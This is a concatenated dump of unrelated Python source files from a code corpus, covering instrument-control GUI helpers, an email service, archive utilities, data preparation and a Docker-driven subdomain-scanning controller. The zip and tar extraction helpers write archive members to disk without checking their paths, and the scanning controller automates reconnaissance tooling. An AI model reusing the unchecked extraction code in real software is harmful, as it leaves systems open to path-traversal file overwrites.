bluesky.preprocessors as bpp\n\n#For Spectroscopy Scans\nglobal erange, estep, acqtime, scan_sec, sample, file, krange, kstep, E0 , ax1, ax2, ax3, xmotor, ymotor, zmotor\nerange = []\nestep = []\nacqtime = 0\nscan_sec = 0\nsample = ''\nfile = ''\nax1 = None\nax2 = None\nax3 = None\nkrange = []\nkstep = []\nE0 = 0\nxmotor = 0\nymotor = 0\nzmotor= 0\n\n\n############################# Setting Parameters (Used in parameters) #################################\n\ndef RunScan(range1,step1,dwell,sample1,file1, range2 = numpy.array([]), step2 = numpy.array([]), energy = 0):\n 'Collects the erange, estep, dwell, samplename, filename, krange, kstep, and E0 to run a Spectroscopy Scan'\n\n global erange, estep, acqtime, sample, file, krange, kstep, E0\n erange = []\n estep = []\n krange = numpy.array([])\n kstep = numpy.array([])\n E0 = 0\n acqtime = 0\n erange = range1\n estep = step1\n krange = range2\n kstep = step2\n E0 = energy\n acqtime = dwell\n sample = sample1\n file = file1\n\n\n############################# Setting Seconds (Used in parameters) #################################\n\ndef CalcTime(sec):\n 'Collecting the seconds for a Spectroscopy Scan (Used for estimated scan time)'\n global scan_sec\n scan_sec = 0\n scan_sec = sec\n\n\n############################# Retrieving the Parameters (Used in main) #################################\n\ndef collect_args(ax11 = None, ax22 = None, ax33 = None):\n 'Sending main the kwargs to run a my_xanes plan'\n global erange, estep, acqtime, sample, file, krange, kstep, E0, ax1, ax2, ax3, xmotor, ymotor, zmotor\n ax1 = ax11\n ax2 = ax22\n ax3 = ax33\n if erange == []:\n #The user forgot to save the parameters\n return 0\n elif krange == []:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange,\n 'k_steps': kstep, 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n else:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange.tolist(),\n 'k_steps': kstep.tolist(), 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n\n\n\n############################# Retrieving the Parameters (Used in Queue) #################################\n\ndef add_to_queue():\n 'Sending the queue the kwargs to add to the queue'\n global krange, kstep, E0, erange, estep, acqtime, sample, file, ax1, ax2, ax3, xmotor, ymotor, zmotor\n if erange == []:\n #The user forgot to save the parameters\n return 0\n elif krange == []:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange,\n 'k_steps': kstep, 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n else:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange.tolist(),\n 'k_steps': kstep.tolist(), 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n\n\n\n################################### Retrieving Seconds (Used in main) ###################################\n\ndef collect_secs():\n global scan_sec\n return scan_sec\n\n\n################################## Setting Motors (Used in Location)#######################################\n\ndef set_motors(x, y, z):\n global xmotor, ymotor, zmotor\n xmotor = 0\n ymotor = 0\n zmotor = 0\n xmotor = x\n ymotor = y\n zmotor = z\n\n\n\n\n\n\n#For XRF Mapping\nglobal xstart,xstop,xnum, ystart,ystop, ynum, xrf_dwell, second, flymotor, stepmotor,courseXfly,courseYfly\nxstart = 0\nystart = 0\nxstop = 0\nystop = 0\nynum = 0\nxnum = 0\nxrf_dwell = 0\nsecond = 0\nflymotor = ''\nstepmotor = ''\ncourseXfly=''\ncourseYfly=''\n\n\n############################# Setting Parameters (Used in Window_) #################################\n\ndef SavingXRF(xstart1,xstop1,xnum1, ystart1,ystop1, ynum1, xrf_dwell1, second1, flymotor1, stepmotor1,courseXfly_,courseYfly_ ):\n 'Collects the xstart, xstop xnum, ystart, ystop, ynum, dwell, seonds, flymotor, and stepping motor to run a Spectroscopy Scan'\n global xstart, xstop, xnum, ystart, ystop, ynum, xrf_dwell, second, flymotor, stepmotor,courseXfly,courseYfly\n xstart = 0\n ystart = 0\n xstop = 0\n ystop = 0\n ynum = 0\n xnum = 0\n xrf_dwell = 0\n second = 0\n flymotor = ''\n stepmotor = ''\n xstart = xstart1\n ystart = ystart1\n xstop = xstop1\n ystop = ystop1\n xnum = xnum1\n ynum = ynum1\n xrf_dwell = xrf_dwell1\n second = second1\n flymotor = flymotor1\n stepmotor = stepmotor1\n courseXfly = courseXfly_\n courseYfly=courseYfly_\n\n\n############################# Retrieving the Parameters (Used in main) #################################\n\ndef Collecting_XRF(lg):\n 'Sending main the args and plan to run a grid scan'\n global xstart, xstop, xnum, ystart, ystop, ynum,courseXfly,courseYfly,xrf_dwell\n # print (xstart,xstop,xnum,ystart,ystop, ynum,courseXfly,courseYfly)\n detectors = [noisy_det]\n if flymotor == courseXfly:\n print(\" \")\n x_scan = ('RE(scan_and_fly( {} , {}, {}, {}, {}, {}, {} )'\n .format(xstart, xstop, xnum, ystart, \n ystop, ynum,xrf_dwell))\n \n # print (x_scan)\n print(x_scan)\n return bpp.subs_decorator([lg])(grid_scan), (detectors, motor1, xstart, xstop, xnum, motor2, ystart, ystop, ynum, False)\n\n else:\n\n yscan = ('RE(y_scan_and_fly( {} , {}, {}, {}, {}, {}, {} )'\n .format(ystart, ystop, ynum, xstart, xstop, xnum,xrf_dwell))\n\n print (yscan)\n\n return bpp.subs_decorator([lg])(grid_scan), (detectors, motor1, xstart, xstop, xnum, motor2, ystart, ystop, ynum, False) \n\n\n############################# Retrieving the Parameters (Used in queue) #################################\n\ndef add_xrf_to_queue():\n 'Used to set up display item in queue'\n global xstart, xstop, xnum, ystart, ystop, ynum\n return [xstart, xstop, xnum, ystart, ystop, ynum]\n\n\n############################# Retrieving the Parameters (Used in queue) #################################\n\ndef add_xrf_args():\n 'Adding the args to the queue'\n global xstart, xstop, xnum, ystart, ystop, ynum\n detectors = [noisy_det]\n return (detectors, motor1, xstart, xstop, xnum, motor2, ystart, ystop, ynum, False)\n\n\n############################### Retrieving Seconds (Used in main) ###################################\n\ndef Seconds_XRF():\n global second\n return second\n\n\n\n############################## Retrieving xnum, ynum (Used in main) #################################\n\ndef NeedXandY():\n 'Needed to set up the plot for grid scans'\n global xnum,ynum\n return xnum,ynum\n\n\n\n############################# Retrieving the Flymotor, Stepmotor (Used in main) ###################\n\ndef ReadFlyandStep():\n global flymotor, stepmotor\n return flymotor, stepmotor\n\n\n","sub_path":"srxgui/MainWindow/MainScreen_Helper.py","file_name":"MainScreen_Helper.py","file_ext":"py","file_size_in_byte":7546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"575473023","text":"import requests\nfrom django.test import TestCase\n\n# Create your tests here.\nfrom fake_useragent import UserAgent\n\nheaders={\n 'User-Agent':UserAgent().chrome\n}\n\n\n#测试中间件的正确性\ndef testMiddle():\n url='http://127.0.0.1:8000/login/'\n for i in range(100):\n response=requests.get(url,headers=headers)\n content=response.text\n print(content)\n\n\nif __name__ == '__main__':\n testMiddle()","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"385033617","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/geolocation/us_states.py\n# Compiled at: 2009-06-11 03:26:27\n\"\"\"Library for the states of the USA\n\nstate_names - A dictionary of US State Names\n key: 2-letter state code\n value: state name\n\nstate_codes - A dictionary of US State Names\n value: 2-letter state code\n key: state name\n\"\"\"\nstate_names = dict(AK='Alaska', AL='Alabama', AR='Arkansas', AS='American Samoa', AZ='Arizona', CA='California', CO='Colorado', CT='Connecticut', DC='District Of Columbia', DE='Delaware', FL='Florida', FM='Federated States Of Micronesia', GA='Georgia', GU='Guam', HI='Hawaii', IA='Iowa', ID='Idaho', IL='Illinois', IN='Indiana', KS='Kansas', KY='Kentucky', LA='Louisiana', MA='Massachusetts', MD='Maryland', ME='Maine', MH='Marshall Islands', MI='Michigan', MN='Minnesota', MO='Missouri', MP='Northern Mariana Islands', MS='Mississippi', MT='Montana', NC='North Carolina', ND='North Dakota', NE='Nebraska', NH='New Hampshire', NJ='New Jersey', NM='New Mexico', NV='Nevada', NY='New York', OH='Ohio', OK='Oklahoma', OR='Oregon', PA='Pennsylvania', PR='Puerto Rico', PW='Palau', RI='Rhode Island', SC='South Carolina', SD='South Dakota', TN='Tennessee', TX='Texas', UT='Utah', VA='Virginia', VI='Virgin Islands', VT='Vermont', WA='Washington', WI='Wisconsin', WV='West Virginia', WY='Wyoming')\nstate_codes = {'Alaska': 'AK', \n 'Alabama': 'AL', \n 'Arkansas': 'AR', \n 'American Samoa': 'AS', \n 'Arizona': 'AZ', \n 'California': 'CA', \n 'Colorado': 'CO', \n 'Connecticut': 'CT', \n 'District Of Columbia': 'DC', \n 'Delaware': 'DE', \n 'Florida': 'FL', \n 'Federated States Of Micronesia': 'FM', \n 'Georgia': 'GA', \n 'Guam': 'GU', \n 'Hawaii': 'HI', \n 'Iowa': 'IA', \n 'Idaho': 'ID', \n 'Illinois': 'IL', \n 'Indiana': 'IN', \n 'Kansas': 'KS', \n 'Kentucky': 'KY', \n 'Louisiana': 'LA', \n 'Massachusetts': 'MA', \n 'Maryland': 'MD', \n 'Maine': 'ME', \n 'Marshall Islands': 'MH', \n 'Michigan': 'MI', \n 'Minnesota': 'MN', \n 'Missouri': 'MO', \n 'Northern Mariana Islands': 'MP', \n 'Mississippi': 'MS', \n 'Montana': 'MT', \n 'North Carolina': 'NC', \n 'North Dakota': 'ND', \n 'Nebraska': 'NE', \n 'New Hampshire': 'NH', \n 'New Jersey': 'NJ', \n 'New Mexico': 'NM', \n 'Nevada': 'NV', \n 'New York': 'NY', \n 'Ohio': 'OH', \n 'Oklahoma': 'OK', \n 'Oregon': 'OR', \n 'Pennsylvania': 'PA', \n 'Puerto Rico': 'PR', \n 'Palau': 'PW', \n 'Rhode Island': 'RI', \n 'South Carolina': 'SC', \n 'South Dakota': 'SD', \n 'Tennessee': 'TN', \n 'Texas': 'TX', \n 'Utah': 'UT', \n 'Virginia': 'VA', \n 'Virgin Islands': 'VI', \n 'Vermont': 'VT', \n 'Washington': 'WA', \n 'Wisconsin': 'WI', \n 'West Virginia': 'WV', \n 'Wyoming': 'WY'}","sub_path":"pycfiles/GeoLocation-0.1.1dev-py2.5/us_states.py","file_name":"us_states.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"34296341","text":"#!/usr/bin/env python3\n\n# python中变量名可以是数字、字母、下划线的组合,字母区分大小写,且不能以数字开头\n# = 是赋值语句,可以把任意数据类型赋值给变量\na1 = 7\nprint(a1)\nA1 = \"str\"\nprint(A1)\na2_ = 1.23\nprint(a2_)\n\n# 可以给同一变量赋不同类型的值\na1 = \"str\"\nprint(a1)\n\n# ''和\"\"均可表示字符串\nleijun = \"I'm OK\"\ngoodgoodstudy = 'Learning python in \"imooc\" '\nprint(leijun)\nprint(goodgoodstudy)\n\n\n# 斐波那契数列,当调用函数并输入参数x,输出数列前x位\n\ndef feibonaqi(x):\n i = 0\n a = 0\n b = 1\n while i < x:\n print(b, end=' ')\n m = b\n n = a + b\n a = m\n b = n\n i += 1\n\n\nfeibonaqi(5)\n\n\ndef feibonaqi_simple(x, i=0):\n a, b = 0, 1\n while i < x:\n print(b, end=' ')\n a, b = b, a + b\n i += 1\n\n\nfeibonaqi_simple(5)\n","sub_path":"python_basics/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"290444418","text":"import logging\nfrom dataclasses import dataclass\nfrom typing import Optional\n\nimport mailchimp_transactional\nfrom sqlalchemy import select\n\nfrom lms.models import TaskDone\n\nLOG = logging.getLogger(__name__)\n\n\n@dataclass\nclass EmailSender:\n subaccount: str\n \"\"\"The Mailchimp subaccount ID to use to send the email.\"\"\"\n\n email: str\n \"\"\"The email address that the email will appear to come from.\"\"\"\n\n name: str\n \"\"\"The full name that the email will appear to come from.\"\"\"\n\n\n@dataclass\nclass EmailRecipient:\n email: str\n \"\"\"The email address to send to.\"\"\"\n\n name: str\n \"\"\"The recipient full name to use in the email's To: header.\"\"\"\n\n\nclass MailchimpError(Exception):\n \"\"\"An error when sending an email.\"\"\"\n\n\nclass MailchimpService:\n def __init__(self, db, api_key):\n self.db = db\n self.mailchimp_client = mailchimp_transactional.Client(api_key)\n\n def send_template( # pylint:disable=too-many-arguments\n self,\n template_name: str,\n sender: EmailSender,\n recipient: EmailRecipient,\n template_vars: dict,\n unsubscribe_url: Optional[str] = None,\n task_done_key: Optional[str] = None,\n ):\n \"\"\"\n Send an email using Mailchimp Transactional's send-template API.\n\n https://mailchimp.com/developer/transactional/api/messages/send-using-message-template/\n \"\"\"\n\n if task_done_key:\n if self.db.execute(\n select(TaskDone).filter_by(key=task_done_key)\n ).one_or_none():\n LOG.info(\"Not sending duplicate email %s\", task_done_key)\n return\n\n headers = {}\n\n if unsubscribe_url:\n # If we do provide a unsubscribe_url expose it as template var\n # and add the corresponding header for clients that support it.\n template_vars[\"unsubscribe_url\"] = unsubscribe_url\n headers[\"List-Unsubscribe\"] = unsubscribe_url\n\n params = {\n \"template_name\": template_name,\n # We're not using template_content but we still need to pass an\n # empty value or the Mailchimp API call fails.\n \"template_content\": [{}],\n \"message\": {\n \"subaccount\": sender.subaccount,\n \"from_email\": sender.email,\n \"from_name\": sender.name,\n \"to\": [{\"email\": recipient.email, \"name\": recipient.name}],\n \"track_opens\": True,\n \"track_clicks\": True,\n \"global_merge_vars\": [\n {\"name\": key, \"content\": value}\n for key, value in template_vars.items()\n ],\n \"headers\": headers,\n },\n \"async\": True,\n }\n\n LOG.info(\"mailchimp_client.send_template(%r)\", params)\n\n try:\n self.mailchimp_client.messages.send_template(params)\n except Exception as exc:\n raise MailchimpError() from exc\n\n if task_done_key:\n # Record the email send in the DB to avoid sending duplicates.\n self.db.add(TaskDone(key=task_done_key))\n\n\ndef factory(_context, request):\n return MailchimpService(request.db, request.registry.settings[\"mailchimp_api_key\"])\n","sub_path":"lms/services/mailchimp.py","file_name":"mailchimp.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"500647575","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n# @Time : 2020/04/25 18:20\n# @Email : lukeqinlu@yeah.net\n# @Author : Luke\n# @File : socket_1.py\n# @notice :\n\n\nfrom socket import socket, SOCK_STREAM, AF_INET\nfrom datetime import datetime\n\n\ndef main():\n server = socket(family=AF_INET, type=SOCK_STREAM)\n server.bind(('127.0.0.1', 9999))\n server.listen(512)\n\n print('Server starting listening...')\n while True:\n client, addr = server.accept()\n print(str(addr) + 'Accepted to server.')\n client.send(str(datetime.now()).encode('utf-8'))\n client.close()\n\n\nif __name__ == '__main__':\n main()","sub_path":"python_100_days/day01_15/socket_1.py","file_name":"socket_1.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"332221764","text":"import os\nimport shutil\n\nfrom ruamel import yaml\n\nPROJECT_DIRECTORY = os.path.realpath(os.path.curdir)\nPROVIDER = \"{{ cookiecutter.provider }}\"\nCI_PROVIDER = \"{{ cookiecutter.ci_cd.type | default('none') }}\"\nENVIRONMENTS = eval(\"{{ cookiecutter.environments }}\")\nTERRAFORM_STATE = \"{{ cookiecutter.terraform_state.type }}\"\n\n\ndef remove_directory(dirpath):\n shutil.rmtree(os.path.join(PROJECT_DIRECTORY, dirpath))\n\n\ndef remove_file(filepath):\n os.remove(os.path.join(PROJECT_DIRECTORY, filepath))\n\n\nif __name__ == \"__main__\":\n if ENVIRONMENTS:\n os.makedirs(\"environments\", exist_ok=True)\n for name, spec in ENVIRONMENTS.items():\n with open(f\"environments/{name}\", \"w\") as f:\n yaml.dump(spec, f)\n\n # Remove any unused cloud infrastructure\n if PROVIDER != \"aws\":\n remove_file(\"infrastructure/aws.tf\")\n remove_directory(\"infrastructure/modules/aws\")\n\n if PROVIDER != \"do\":\n remove_file(\"infrastructure/do.tf\")\n remove_directory(\"infrastructure/modules/digitalocean\")\n\n if PROVIDER != \"gcp\":\n remove_file(\"infrastructure/gcp.tf\")\n remove_directory(\"infrastructure/modules/gcp\")\n\n if PROVIDER != \"azure\":\n remove_file(\"infrastructure/azure.tf\")\n remove_directory(\"infrastructure/modules/azure\")\n\n # if PROVIDER == \"local\" all above will have been removed\n\n # Remove any unused state\n\n if TERRAFORM_STATE == \"local\":\n remove_file(\"infrastructure/state.tf\")\n\n if TERRAFORM_STATE != \"remote\" or PROVIDER == \"local\":\n remove_directory(\"terraform-state\")\n else:\n # Remove the clouds we don't need:\n if PROVIDER != \"aws\":\n remove_directory(\"terraform-state/modules/aws\")\n\n if PROVIDER != \"do\":\n remove_directory(\"terraform-state/modules/digitalocean\")\n\n if PROVIDER != \"gcp\":\n remove_directory(\"terraform-state/modules/gcp\")\n\n if PROVIDER != \"azure\":\n remove_directory(\"terraform-state/modules/azure\")\n\n # Remove any unused CI\n\n if CI_PROVIDER != \"github-actions\":\n remove_directory(\".github\")\n\n if CI_PROVIDER != \"gitlab-ci\":\n remove_file(\".gitlab-ci.yml\")\n\n # if CI_PROVIDER == \"none\" all above will have been removed\n\n # templates directory is only used by includes\n remove_directory(\"templates\")\n","sub_path":"qhub/template/hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"47348668","text":"import os\nimport zipfile\nimport tarfile\n\n\"\"\" Originally from\n\n http://code.activestate.com/recipes/252508/\n\n heavily refactored since\n\n\"\"\"\n\n\nclass Archive(object):\n\n def _createstructure(self, file, dir):\n self._makedirs(self._listdirs(file), dir)\n\n def _makedirs(self, directories, basedir):\n \"\"\" Create any directories that don't currently exist \"\"\"\n for dir in directories:\n curdir = os.path.join(basedir, dir)\n if not os.path.exists(curdir):\n os.makedirs(curdir)\n\n\nclass Unzip(Archive):\n def extract(self, zfile, dest='.'):\n dest = os.path.abspath(dest)\n if not dest.endswith(':') and not os.path.exists(dest):\n os.makedirs(dest)\n\n zf = zipfile.ZipFile(zfile)\n\n # create directory structure to house files\n self._createstructure(zfile, dest)\n\n # extract files to directory structure\n for i, name in enumerate(zf.namelist()):\n if not name.endswith('/'):\n outfile = open(os.path.join(dest, name), 'wb')\n outfile.write(zf.read(name))\n outfile.flush()\n outfile.close()\n\n def _listdirs(self, zfile):\n \"\"\" Grabs all the directories in the zip structure\n This is necessary to create the structure before trying\n to extract the file to it. \"\"\"\n\n zf = zipfile.ZipFile(zfile)\n\n dirs = set()\n for name in zf.namelist():\n if name.endswith('/'):\n dirs.add(name)\n elif '/' in name:\n path = name[0:name.rindex('/')]\n dirs.add(path)\n\n return dirs\n\n\nclass Untar(Archive):\n def extract(self, tfile, dest=\".\"):\n if not dest.endswith(':') and not os.path.exists(dest):\n os.makedirs(dest)\n\n tff = tarfile.open(name=tfile)\n tff.extractall(dest)\n\n def _listdirs(self, tfile):\n \"\"\" Grabs all the directories in the tar structure\n This is necessary to create the structure before trying\n to extract the file to it. \"\"\"\n\n tff = tarfile.open(name=tfile)\n return [name for name in tff.getnames() if name.endswith('/')]\n\n\nif __name__ == \"__main__\":\n ut = Untar()\n ut.extract(r\"/tmp/test.tar\", r\"/tmp/testout\")\n","sub_path":"AQE_robotsolution/robot/library/ArchiveLibrary/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"164694481","text":"import pandas as pd\nimport ast\n\n\ndef dataPrep(ings, prods, prod_ing):\n #clean weird ingredient\n ings['ingredient'] = ings['ingredient'].replace('Stearic Acid(Masking, Fragrance, Emulsion Stabilising, Emulsifying, Sufactant, Refatting, Surfactantsurfactant-Cleansing Agent Is Included As A Function For The Soap Form Of Stearic Acid.', 'Stearic Acid')\n prod_ing['ingredient'] = prod_ing['ingredient'].replace('Stearic Acid(Masking, Fragrance, Emulsion Stabilising, Emulsifying, Sufactant, Refatting, Surfactantsurfactant-Cleansing Agent Is Included As A Function For The Soap Form Of Stearic Acid.', 'Stearic Acid')\n #drop duplicates\n ings = ings.drop_duplicates(subset = 'ingredient')\n \n #create a df so that each ingredient has a uniqueID\n ing_uniqueID = ings.loc[:,['ingredient']].reset_index().drop(['index'], axis = 1)\n #ing_uniqueID = ing_uniqueID.drop(['index'], axis = 1)\n ing_uniqueID['uniqueID'] = ing_uniqueID.index\n \n #Merge prod_ing and the unique ID so that each ingredient has it's unique ID\n prod_ing = pd.merge(prod_ing, ing_uniqueID, on='ingredient')\n #Sort by product id and ingredient order\n prod_ing = prod_ing.sort_values(['id','order'])\n\n ##now we want the ingredients to be shown as a list instead of separate cells\n prod_ing.groupby('id')['ingredient'].apply(list)\n \n ##group and create list\n prod_ing_lists = prod_ing.groupby('id')['ingredient'].apply(list)\n prod_ing_ID_lists = prod_ing.groupby('id')['uniqueID'].apply(list)\n\n ##convert back to dataframe and reset index\n prod_ing_df = prod_ing_lists.to_frame().reset_index()\n prod_ing_ID_df = prod_ing_ID_lists.to_frame().reset_index()\n ##check to make sure unique id's are still in tact (id shouldn't be exactly == to index)\n prod_ing_lists = pd.merge(prod_ing_df, prod_ing_ID_df, on='id')\n prod_ing_lists = prod_ing_lists.rename(columns = {'ingredient': 'ingList', 'uniqueID': 'ing#List' })\n \n ##merge ingredient lists with products\n products_and_ingredients= pd.merge(prod_ing_lists, prods, on = 'id')\n #add a column with ingredient counts\n products_and_ingredients['ingCount'] = products_and_ingredients['ingList'].apply(lambda x: len(x))\n \n #print('Number of products: ', len(products_and_ingredients))\n #print('Number of unique ingredients: ', len(ing_uniqueID))\n #df.loc[df['id'] == idx]\n products_and_ingredients['id2'] = products_and_ingredients['id']\n products_and_ingredients = products_and_ingredients.drop(['id'], axis = 1)\n products_and_ingredients = products_and_ingredients.rename(columns={'index': 'id'})\n return (products_and_ingredients)\n\ndef getScores(list_of_values, ings):\n ingScores = ings[ings['ingredient'].isin(list_of_values)]\n ingScores = ingScores.iloc[0:, 0:2]\n ingScores['toxLowrisk'] = 0\n ingScores['toxMedRisk'] = 0\n ingScores['toxHighRisk'] = 0\n ingScores['toxNA'] = 0\n ingScores = ingScores.reset_index()\n\n for index, row in ingScores.iterrows():\n #print(ingScores.iloc[index,1])\n if ingScores.iloc[index,2] > 0 and ingScores.iloc[index,2] < 4:\n ingScores.loc[index, 'toxLowrisk'] = 1\n #print('low risk')\n elif ingScores.iloc[index,2] > 3 and ingScores.iloc[index,2] < 7:\n ingScores.loc[index, 'toxMedRisk'] = 1\n #print('med risk')\n elif ingScores.iloc[index,2] > 6:\n ingScores.loc[index, 'toxHighRisk'] = 1\n #print('med risk') \n else:\n ingScores.loc[index, 'toxNA'] = 1\n\n toxLowrisk = ingScores['toxLowrisk'].sum()/len(ingScores)\n toxMedRisk = ingScores['toxMedRisk'].sum()/len(ingScores)\n toxHighRisk = ingScores['toxHighRisk'].sum()/len(ingScores)\n toxNA = ingScores['toxNA'].sum()/len(ingScores)\n return [toxLowrisk, toxMedRisk, toxHighRisk, toxNA]","sub_path":".ipynb_checkpoints/dataPrep-checkpoint.py","file_name":"dataPrep-checkpoint.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"224630243","text":"import json\nimport os\nimport sys\nfrom difflib import Differ\nfrom typing import Callable, TypeVar, Generator, Any\n\nfrom . import vcard\nfrom .sort import DEFAULT_NAMES\n\nT = TypeVar('T')\n\n\ndef gen_cards(path):\n with open(path, 'r') as path:\n yield from vcard.gen_cards(path)\n\n\ndef apply_map(f: Callable[..., T], diff_args, *same) -> Generator[T, Any, None]:\n for args in diff_args:\n yield f(*(args + same))\n\n\ndef diff_header(a, b):\n print('--- %s' % a)\n print('+++ %s' % b)\n\n\ndef diff_section(card, prefix, names, j=None):\n print('@@ @@ %s%s' % (prefix, json.dumps(j or card.to_json(names))))\n\n\ndef print_whole_card(card, prefix, cards, names, j=None):\n diff_section(card, prefix, names, j)\n for line in card.vcard_lines():\n print('%s%s' % (prefix, line), end='')\n return next(cards, None)\n\n\ndef print_diff(card_a, card_b, j):\n diff_section(card_a, ' ', None, j)\n lines_a, lines_b = apply_map(lambda card: tuple(card.vcard_lines()), ((card_a,), (card_b,)))\n for line in Differ().compare(lines_a, lines_b):\n if not line.startswith('?'):\n print(''.join((line[0], line[2:])), end='')\n\n\ndef main(argv):\n path_a, path_b, names = argv[0], argv[1], argv[2:]\n if not names:\n names = DEFAULT_NAMES\n cards_a, cards_b = apply_map(gen_cards, ((path_a,), (path_b,)))\n card_a, card_b = apply_map(lambda g: next(g, None), ((cards_a,), (cards_b,)))\n h = diff_header\n while card_a or card_b:\n if h:\n h(path_a, path_b)\n h = None\n if card_a and not card_b:\n card_a = print_whole_card(card_a, '-', cards_a, names)\n elif (not card_a) and card_b:\n card_b = print_whole_card(card_b, '+', cards_b, names)\n else:\n json_a, json_b = apply_map(lambda card: card.to_json(names), ((card_a,), (card_b,)))\n if json_a < json_b:\n card_a = print_whole_card(card_a, '-', cards_a, names, json_a)\n elif json_a > json_b:\n card_b = print_whole_card(card_b, '+', cards_b, names, json_b)\n else:\n if card_a.eol != card_b.eol:\n card_a.eol = card_b.eol = os.linesep\n print_diff(card_a, card_b, json_a)\n card_a, card_b = apply_map(lambda g: next(g, None), ((cards_a,), (cards_b,)))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"vcard/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323798012","text":"from app.config import DOCKER_CLIENT\nfrom app.lib.handler.decorator import threaded\nfrom app.lib.core import formatnum\nfrom app import mongo\n\nimport time\nimport datetime\nimport json\n\n\nclass Controller(object):\n \"\"\"\n 用来控制docker任务的核心函数\n \"\"\"\n\n @staticmethod\n @threaded\n def stop_contain(contain_id):\n \"\"\"\n 用来终止启动的容器\n :param contain_id:8462ccf520899aff47b7bdb6b8f0fa65cc43f24c214a26dd94f2d58425bd6799\n :return:\n \"\"\"\n\n try:\n\n if DOCKER_CLIENT.containers.get(contain_id).status == \"running\":\n docker_object = DOCKER_CLIENT.containers.get(contain_id)\n docker_object.stop()\n\n return True\n else:\n\n return True\n except:\n return False\n\n @staticmethod\n @threaded\n def subdomain_scan(uid):\n \"\"\"\n 添加域名扫描任务\n :param domain: example.com\n :param uid: c2385a01-bb0a-40a3-8694-05a31a440ba6\n :return:\n \"\"\"\n\n # 有任务在执行的时候先暂停\n while True:\n\n time.sleep(3)\n\n task = mongo.db.tasks.find_one({'id': uid})\n\n if task is None:\n return True\n\n if mongo.db.tasks.find({'status': \"Running\", \"hack_type\": \"域名扫描\"}).count() > 0:\n mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'status': 'Waiting',\n }\n }\n )\n time.sleep(5)\n\n else:\n\n mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'status': 'Running',\n }\n }\n )\n\n break\n\n taskCollection = mongo.db.tasks.find_one({\"id\": uid})\n if taskCollection is None:\n return True\n\n targetList = taskCollection[\"target\"].split(\",\")\n parentName = taskCollection[\"parent_name\"]\n tasks_num = taskCollection[\"live_host\"]\n\n for t in targetList:\n newTarget = dict()\n newTarget[\"Purpose\"] = t\n newTarget[\"parentName\"] = parentName\n newTarget[\"pid\"] = uid\n\n infoString = str(json.dumps(newTarget, ensure_ascii=False))\n\n contain = DOCKER_CLIENT.containers.run(\"ap0llo/oneforall:0.1.0\", [infoString], detach=True, remove=True,\n auto_remove=True,\n network=\"host\")\n\n newTaskCollection = mongo.db.tasks.find_one({\"id\": uid})\n json_target = json.loads(newTaskCollection.get(\"hidden_host\"))\n\n json_target[t] = \"0.00%\"\n\n mongo.db.tasks.update_one({\"id\": uid}, {\n \"$set\": {\"contain_id\": contain.id, 'hidden_host': json.dumps(json_target, ensure_ascii=False)}})\n\n # 心跳线程用来更新任务状态\n while True:\n\n time.sleep(3)\n\n task_dir = mongo.db.tasks.find_one({\"id\": uid})\n if task_dir is None:\n return True\n\n process_json = json.loads(task_dir.get(\"hidden_host\"))\n\n if len(process_json) == 0:\n time.sleep(10)\n\n now_progress = 0\n # 统计总任务进度\n for k, v in process_json.items():\n progress_ = formatnum(v)\n now_progress = now_progress + progress_\n\n progress = '{0:.2f}%'.format(now_progress / tasks_num)\n\n if progress == \"100.00%\":\n mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'progress': \"100.00%\",\n 'status': \"Finished\",\n \"end_time\": datetime.datetime.now()\n }\n }\n )\n return\n\n else:\n mongo.db.tasks.update_one(\n 